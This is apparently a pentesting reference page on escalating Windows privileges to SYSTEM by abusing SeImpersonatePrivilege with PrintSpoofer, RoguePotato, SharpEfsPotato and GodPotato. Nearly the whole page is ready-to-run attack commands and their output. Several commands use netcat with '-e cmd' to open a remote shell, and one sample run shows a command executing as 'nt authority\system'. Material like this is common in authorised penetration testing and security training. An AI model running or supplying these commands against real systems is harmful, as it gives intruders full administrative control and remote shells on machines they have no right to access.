# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
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{% hint style="warning" %} **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works. {% endhint %} ## Quick Demo ### PrintSpoofer ```bash c:\PrintSpoofer.exe -c "c:\tools\nc.exe 443 -e cmd" -------------------------------------------------------------------------------- [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK NULL ``` ### RoguePotato ```bash c:\RoguePotato.exe -r -c "c:\tools\nc.exe 443 -e cmd" -f 9999 ``` ### SharpEfsPotato ``` SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" SharpEfsPotato by @bugch3ck Local privilege escalation from SeImpersonatePrivilege using EfsRpc. Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0. [+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2 df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc: [x]RpcBindingSetAuthInfo failed with status 0x6d3 [+] Server connected to our evil RPC pipe [+] Duplicated impersonation token ready for process creation [+] Intercepted and authenticated successfully, launching program [+] Process created, enjoy! C:\temp>type C:\temp\w.log nt authority\system ``` ### GodPotato ``` GodPotato -cmd "cmd /c whoami" GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 2012" ```
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